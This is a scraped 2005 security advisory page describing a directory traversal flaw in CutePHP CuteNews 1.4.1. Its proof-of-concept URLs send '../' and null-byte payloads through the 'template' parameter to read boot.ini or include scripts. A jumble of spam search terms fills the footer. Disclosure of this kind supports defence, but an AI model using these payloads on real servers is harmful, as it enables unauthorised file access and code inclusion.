about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , CutePHP CuteNews Directory Traversal Vulnerability


Title CutePHP CuteNews Directory Traversal Vulnerability
Published 2005-11-03-12:00AM
Updated 2005-11-03-05:36PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to <retrogod@aliceposta.it>.
Vulnerable  CutePHP CuteNews 1.4.1
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../[script]
http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:17:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
lo865l Ajithnudew Crack Data sexphone free viedo wwwbra Pichchars Www.stockh php-nuke 2 200 /compo www.j131.c www.lnwlc. www.Sexwal www.safe36 php-nuke 2 Kernel Photos world+sex. vbylletin vdt addentry.p free dog s Tamil arti indasex t749t CAN 2005 1 Ipuh Wap.phoner /search/ex news for c boonex.htm hot sex ve www.nagnga Crack Data FREE SEXI kose toooo php-nuke 2 geourdunew lo326l http:/www. ccpktv.cn/ psybnc 2.3 news for c for www.se www /tags. Www.Youtub fbmfhkhjg, Womenssex Indian hom free video